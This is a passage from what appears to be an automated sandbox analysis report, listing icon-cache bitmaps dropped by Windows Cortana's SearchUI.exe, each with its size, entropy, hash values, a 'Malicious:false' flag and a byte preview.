                      Preview: BM............|...,...,..... ......................................... niW............................................................................AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AAA.AA
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_MixedReality_Portal_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.0029937207885342
                      Encrypted:false
                      SSDEEP:12:mqYmuSKuSqGCPeKyqqX7SqL2/SbS6TXXGKyjqD:mqCu/GG/+/y/WvXek
                      MD5:4214A31D10FA06C2D1636AB4B4A43168
                      SHA1:8F130013C3EA6FEC6D24952940FD0DC53FC7E378
                      SHA-256:9EEAE0D45CDE62955407D4DED176412E637151D988F1EF14E39E90B8F098F0E3
                      SHA-512:4BFBAAF3F9FAF4867CA93FDD1232F720ED6822FFB0EF1AE7FC3BDC00ED8E9C456377B9F3B43565C6F2E4788F028803C5ACA0AF7439E99A382E333E9FC7FB9AA3
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_EXCEL_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.826253208559914
                      Encrypted:false
                      SSDEEP:192:ChHR82uYhuGwRJRtU1t+1L0H0XxeW3kJWQfsKBLq:e8i6wI
                      MD5:2C3D8B38F4706D2BD623310DE468A21B
                      SHA1:43AA3A23BE9E599C8DF874B631E2291FA0FD5E25
                      SHA-256:EB7C131073394F7824CD2152E9EF1F87BFA7FEB09097AF42D7A882B3AD7B7AC3
                      SHA-512:45FA14F771ADB80EAAC8D0BC02E70D9E9E453D27238698C7953DE7434C4A182EADAD6E7FC908DE4E5BABD487F9DC917FA3BA67CA599C5889804D948DA7FD1FD8
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_MSOUC_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.864127619296489
                      Encrypted:false
                      SSDEEP:192:dR7WdJgGS8zsdddddddM/d5QwdrEEEtceMZTj3YegaPBw3Onp2tiMARUZaCPmD9Q:mdJ9S8zf4Pv9R8888vX8lwrwV8b
                      MD5:943DC823B68D13170C037022CF94D95C
                      SHA1:0E39464D007F8C35667277D3FA42F297A5D75820
                      SHA-256:EE75215CB2025B29A28BD6BA4D363924EA305ECEEE5CB9C9AFE68DD97C7B0415
                      SHA-512:4AE351553521D41E844F6DE549F1C7A6DD3EB544B50976913CDEA58EDD3E3B8CB81D21B2461258C3AF1C65815CCDAD407AE193D220656A44C6F4D4F21200EAA1
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_ONENOTE_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.8486940892700168
                      Encrypted:false
                      SSDEEP:384:0bgu/QSSSSSSSSSSSSSSSSSSSSSSSSS/E:4+
                      MD5:94B2FFAED19F3E84E96E30B7EDEA3790
                      SHA1:93AFE6557EA8B2312A7CEE7B5A6E8945028C858C
                      SHA-256:4F97440E3C836B425B3309E396AE5FE615D0016546B72E4249539DBE265C05D1
                      SHA-512:174E37795AA5F708C4256CDBA5A9E9057D21EB6E6C8F339536ABCF0A5783EB2F2913067DA7B9C9CA936A6406D5781FC99BFDB7543853E34650A2F32D209E4D2F
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_OneNote_8wekyb3d8bbwe!microsoft_onenoteim
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):3.4122620206830856
                      Encrypted:false
                      SSDEEP:96:a+9ssaHZ6SaSESXS1SPS3tSjE8mmmmm+8mmmmmff8mmmmmq8mmmmmO98mmmmmq8J:arsaj1TCUKMxpod9M
                      MD5:32644DEAD987D55A288127FE92B48F4C
                      SHA1:9DB700BB30FC8D8BB2C03C69CB456E71B92A09F6
                      SHA-256:81625C9854E2BCA824E70CC8A98B3C8C8010DD9920983563DCE3039AA85C222C
                      SHA-512:8ADACA6A7BCAAA53FE14D31303077D2D947151015E9D6E49E17C6A64FA5A378DE461F0AC5A405A16DB4559C1149845825FFF37CD5A0123752B38B4D3FE0FD0D4
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_POWERPNT_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.428484236846765
                      Encrypted:false
                      SSDEEP:192:HQTWzud2W4uyByegx4N45y95HzgT3NjigTq5xBcs0pDtPR3RAzIOHDXknOPJOWNO:wTWPWrIz5qspssgTq5xnD0OPkWX
                      MD5:C314B7443A535D4B39B28C6A2D246EF5
                      SHA1:B7688DF267A8304D3F1F6AFDBCDDBF96A5E86FCD
                      SHA-256:288834F082FB5CA0868A7B8FD3F645C883841D612731771DF1C9490D99AF76AD
                      SHA-512:CA3AC5DEF4B819CBC0CB770A2E0B482E3AD5753F167B2741E7E31C20AB7236559695297B9DD5D8088AC2F1B3886A7E644166C4FAB29DD63C60A906ABC547F422
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_SETLANG_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.5522273155132176
                      Encrypted:false
                      SSDEEP:768:XmmmmmmmmmmmmmmmmmmmmmmViU6PZmc4sax+ksfEY4q55ZYVfhykWSsk6pa7fD9j:uCd
                      MD5:0E2A09C8B94747FA78EC836B5711C0C0
                      SHA1:92495421AD887F27F53784C470884802797025AD
                      SHA-256:0C1CDBBF6D974764AAD46477863059EAEC7B1717A7D26B025F0F8FE24338BB36
                      SHA-512:61530A33A6109467962BA51371821EA55BB36CD2ABC0E7A15F270ABF62340E9166E66A1B10F4DE9A306B368820802C4ADB9653B9A5ACD6F1E825E60128FD2409
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW................................................................................???(III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-III-:::'....PPP)...4...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...)...5:::'ddd0...$..........................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Office_WINWORD_EXE_15
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):4.922448732093031
                      Encrypted:false
                      SSDEEP:192:QsuG47+iPGZOjr0vNEmGjt2q+bDTCI4r+SpP3zWMF4WSSSSSSS:zuph10pk+gvzWMF4WSSSSSSS
                      MD5:A03A0988894C00B0079DF02367D9825B
                      SHA1:E7C6203741BC7B729F4EA6B7AA0AFAC1FCAEC277
                      SHA-256:6F37C8F98B70B89C2CC380D0AA38B0262921202D0EE63561F57A3304575236BD
                      SHA-512:692A6DD4619F7E05C06480D7A65FBEC407A31D30087EE89EFE8EDA8E8A578E7A285F51AF58DDD9E2C1629B9B9B32C57C8031457587B3C9A7088E21B03ECE1B35
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_OneConnect_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.0485117818645842
                      Encrypted:false
                      SSDEEP:12:mqYmukr5t3fHvvnwCwJ4FtFtVdVX3nH3nH3OJY3OW3lV351q/H1h5tr1Z0N13d19:mqBels
                      MD5:E711717276D1E4BF0C6151D1315F3A77
                      SHA1:293324CE77F3ACD7CB94C145E590D3E6F738CC4E
                      SHA-256:468B2A6303CE70FBEE1A1633B771E3610E21DEEB5C717993161B9F63FE0ECE39
                      SHA-512:E21DC3C96C2AD0687C1A2CE41380241EEA3F9624057E88A4D013F0E66B43CEBC5F1CA5237FED05FC1510F8275F6564663FF779E8DD61AB47882953B5539C90D8
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_PPIProjection_cw5n1h2txyewy!Microsoft_PPIProjection
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.5027770058776797
                      Encrypted:false
                      SSDEEP:48:8q4444444444444444YgNqEAXV0j+nOAnDCW7FJ5TtpueHLT8FOziZkwDbDF/DiB:8FIJup3LF
                      MD5:558FD1E31C0B8B6986371C5A7FF74E89
                      SHA1:0D0D8D1E6374E089AE2C55779BCE83EC419C23E2
                      SHA-256:71D7E6260453E9050EC00CB6EFA121FA5F512F1F5B3193F1B89BA0AA7BC3C3EF
                      SHA-512:FC1DA3E1762171E70C738B07CBC7ABB9A193716B1BD911A67FCEA3C465CF2A98FAA17DCF18D349D53919C9D7E4F106FC06AE6A86AB21BDA0EA290E0F026450C3
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_People_8wekyb3d8bbwe!x4c7a3b7dy2188y46d4ya362y19ac5a5805e5x
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.1017212416251607
                      Encrypted:false
                      SSDEEP:12:mqYw77aLDLDLZ4LmLPLPLZULivJxIBfZppMnOgIpXxJThRZxxJL7rhhhJL7TxDRd:mqy/bxIBRpVVdxJlRZxTfXfT9RZprx
                      MD5:C1C9A2668002985EE306EE885384BE1C
                      SHA1:EC9D88EC81F4BB7B029DF92E1A6904B5D0EB7B41
                      SHA-256:7F5F92C2903D03FC07B2EE01240ED0F4A663401BE90E608ED1880E86B3FB785D
                      SHA-512:F6EBC2B5E65C2E3AD88692268F051BE498C7FEE8492CC77DA9B10B9DB1ACCB605CFA1A46D101179B948D4BFB716BDE31B201B159706C6B144F4AA11486C6BDE0
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Print3D_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.1655331569839995
                      Encrypted:false
                      SSDEEP:24:mqWSSSSSSSSSSSSSSSSSSSSSSSSSSSWrjmm7/VGBOLdm2q0IW+WjeGXSSSSS4frH:srjmm7/VGBOLdm2q0IWhjeGXf7
                      MD5:F94E4514C3AB49610BBC91B91D228987
                      SHA1:992831457E2D2B7A6774F20E254F9FC2B04FACC8
                      SHA-256:E42B814890C73DE8A03E9B0E646A63EE83527859F7072A3F03D6BB2434F21C49
                      SHA-512:AE3F1DC09DD2BC6B5560C2A8A567E16F39129D3603CB2B16AB9CDBD0951889CD76053E208B2A98ED0763E924F1DA51645C9926677E02068FD3C30FFFADC5CB7D
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsAlarms_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.411243535025411
                      Encrypted:false
                      SSDEEP:96:hzMRMwYRuoYk8Oh5mKkhmwO/MQDKDVoRX1u4KvjRUeI//RWoB4y:lgY59lMkKoRwT6eI/Mouy
                      MD5:B398365559DB1FE4758851B98FD2631F
                      SHA1:D082DFBC0FB2F5C369EAA31FCA732A95607C8E2A
                      SHA-256:471454244C7A2CB2ED3F7C2012ED8D200F4BE9D226BC7DD65DB365635345F903
                      SHA-512:7EBF90CCED9A6BA6F236F185E3A437721FEB326A1FF562CCE4A5135D130CD45E010E069FBA669938C1CE65683162C5F7234CEEEAE8241DB8B289C33CDED17E27
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsCalculator_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.174084062657408
                      Encrypted:false
                      SSDEEP:12:+/qY8HHHHHHovaa6PTMMMTyyyTHHHToooTuuuTTTTTEEETqqqTfffTgggTmmmHHH:cq+aaBaaBaa
                      MD5:1D4C7131A99B5BD0D49BEE672FEB479A
                      SHA1:23E8B6F7BEFDF7E8A98926B3D3ADC7A7F76DF1F2
                      SHA-256:768172ACD729CBBCEFB986F01CD9C39ACE722A668FD85684E1D0788E993E543E
                      SHA-512:5899756A8ECA0CDBD565091042C188E18B90E12FB52970EF06E99C59A9CE4542A19CAAFBAB235B527CB4C6FA4F46D6EC0F3C5504481456C62817B2C92BFE6F3E
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsCamera_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):0.8944539442401032
                      Encrypted:false
                      SSDEEP:6:mqtgX/mu0000000000000000000000000000000000000000000000000000000X:mqYmu7H73Yjtpcccc8Gb/HX3Xfn
                      MD5:01FB7B4B819B35D4EDA502D69B4AA86A
                      SHA1:9F6CFE0E31F1906060D90D4AE9A5B4428A9FB908
                      SHA-256:0FB3940FB4E6D814BCB727F4592EF12F7F87F18B26EBD85483B5198B78ECCBF4
                      SHA-512:C30F13F1900959AC8D496363547E1FEB871DBE9B191688627DCB5FC47CAF05A44880F454B154387F04FCD13EEB9A0173054338B6F4156C85ED10D6640E582CAC
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsMaps_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.122762277059158
                      Encrypted:false
                      SSDEEP:24:mqonP/xZRwBnAfxhHvkQ/y/UExcRlh3PlEc//i01fRXdXxtxmExtEE3kECJl0Mv/:apzSnaSQRGeP3PWMJHXnHm2u/HmMv
                      MD5:85AC9632B8CF2E468B22528D380B7CE2
                      SHA1:AEC8CA8D1D3AC645D9681EB0D1C562A9EBF6AA0D
                      SHA-256:234FF5EA69C6E3D4CE8DC5EC321D16498060DB040ACE4973AA88038029EAA6AE
                      SHA-512:9896694F3A754EEF4601B79F80AB6E18A6E94213F0D67028577FE39794AF18D8B661E3990CCE2F0D75E15E1C7CA20C4336CD900837D9DB4EDC7EFD8CB5DFFC77
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsSoundRecorder_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):1.1808408973860614
                      Encrypted:false
                      SSDEEP:48:yXf5iSj2WLEMXvrJ3U5nmSbFwXLS8pXoY:qR/VQM/25HFw7SqYY
                      MD5:E09F9826B135379B4E47DCF9F64D56DE
                      SHA1:798B7ACF6103236B026D35F1242D268A08E5DEA1
                      SHA-256:52CC69E4E1E66E4D1518E06ECF198EF0157F417570C9E135E20A24FF3D237BAE
                      SHA-512:E62E17545F59038154ED78672FA0DC184D606506AF58A89370C08EF70553D389DBF23047C41BF0E162CFEEE8490460D47165505345A7393ACA0E03868E2673CC
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW.......................................................................................................................................................................................................3...m...........................................................i...1...............................................................................................................................................................................................................................................................................................................q...........................................................................................n......................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_WindowsStore_8wekyb3d8bbwe!App
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.1004950220477427
                      Encrypted:false
                      SSDEEP:12:mqYmu4TVVVVq3TVVVVq3TVVVVq3TVVVVq3TVVVVq3TVVVVq5fJaJfJaJfJaJfJaR:mqYGGGGG58J8J8J8J8J8gM
                      MD5:38720C9B356A00DDE6E028B02E5E735C
                      SHA1:2345D6624BD11E17C1532FB5F198441E2C06B723
                      SHA-256:D6695C619CB61B5C94BA41F0C2BE56C2DAFE7E43D39BAC35DF7F9EBB162ED930
                      SHA-512:BCD039D65BF09C72D90815D1A63BE5396565E9B53A083B0D6183990FC04D54A3DD3015BC58F7A584983C97A83AA64C20ED0D665F2A0AD7193E069297FE92862C
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_AdministrativeTools
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.9760266392815717
                      Encrypted:false
                      SSDEEP:192:G4wYPImLWJCFvzKKOX9Qa6jWoNJn2LPnxXzG+9rqO:qyzKKOXYxCZTr
                      MD5:C0AD9BD2329A9CA3C3E34331BE950627
                      SHA1:B98DD9F8706EA9BECA0CCAC1F4F20B21D20AC8DA
                      SHA-256:26EB5FC9002181CB1194126E53F74FD0271BD952716200C790B6C14A99D25DAE
                      SHA-512:21FFD65DD7D163B4751EB087E978462B4034C59DB98E938BB11DF308C5D6F95A5B7FABC04B22AC3CFC213E4C13F63510E5163BFCD165D91BEA92B5971280EEB1
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW...........................................................................................................................................................................................(...................................................................................................................................................................................................................................................................d...........................................................................................................................@..................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Computer
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.3874276249544146
                      Encrypted:false
                      SSDEEP:192:/mtq+E0AfJlh2/rfMYG7lOOOOl8iLyk0FFLMFFFmMFFF0MFFF0MFFF5MFFslgNBM:p0ARlh2/rndnddGLIQdnh+RIp
                      MD5:4C670DD3A6599F46A4FF55714879C8DB
                      SHA1:597568545FA7351902945F00B3EC7345CAC5EEF3
                      SHA-256:E7A88DD960478A49EEBAA28E6AC7112BAA092F75F4A690F340EFBBC603F9E1CE
                      SHA-512:F0AD5A1BD4DA935E649DAFF6B922DB25967C14057461D5846820F59B200C8F0686137E4322BCADA71EBBC425F49A495F5D109E943A4545331CE05E5896031A9F
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_ControlPanel
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 96 x 96 x 32
                      Category:dropped
                      Size (bytes):37014
                      Entropy (8bit):3.874824021661371
                      Encrypted:false
                      SSDEEP:384:szMgXGKheIII8SVFBSQ8xFLlSLQU7lbdozJbQt1A+svJC3X:BIII5zb7larNvJ
                      MD5:FB5F8866E1F4C9C1C7F4D377934FF4B2
                      SHA1:D0A329E387FB7BCBA205364938417A67DBB4118A
                      SHA-256:1649EC9493BE27F76AE7304927D383F8A53DD3E41EA1678BACAFF33120EA4170
                      SHA-512:0FBE2843DFEAB7373CDE0643B20C073FDC2FCBEFC5AE581FD1656C253DFA94E8BBA4D348E95CC40D1E872456ECCA894B462860AEAC8B92CEDB11A7CAD634798C
                      Malicious:false
                      Preview: BM............|...`...`..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Cortana_cw5n1h2txyewy!CortanaUI
                      Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                      File Type:PC bitmap, Windows 98/2000 and newer format, 44 x 44 x 32
                      Category:dropped
                      Size (bytes):7894
                      Entropy (8bit):1.0146113403856278
                      Encrypted:false
                      SSDEEP:48:c/Vi8Vi8Vi8Vi8Vi8Vi8Vi8Vi8Vi89i89ifXyiZLHfLLTmlikU:irrrrrrrrTTWXygPTMxU
                      MD5:803CAA0680F77BC53B96047D448BECB2
                      SHA1:F9D5DC3BC072D0F57821C54B2AC1CC18B0A06B27
                      SHA-256:C3DF45F93A209CE209B983B39E2DEFC557AA86B2CFBC5D4995AD856188F45674
                      SHA-512:C7F87E40DB0C05412FB56CAC5E0A9C743DFF6DA4D660FDEB9ADA6FDF2E24F8656A94AABDD971CC1578F265B17F2BAAB248E1F389F4333C251040A4B9D77C4131
                      Malicious:false
                      Preview: BM............|...,...,..... ......................................... niW..............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                      C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\LocalState\AppIconCache\100\Microsoft_Windows_Explorer
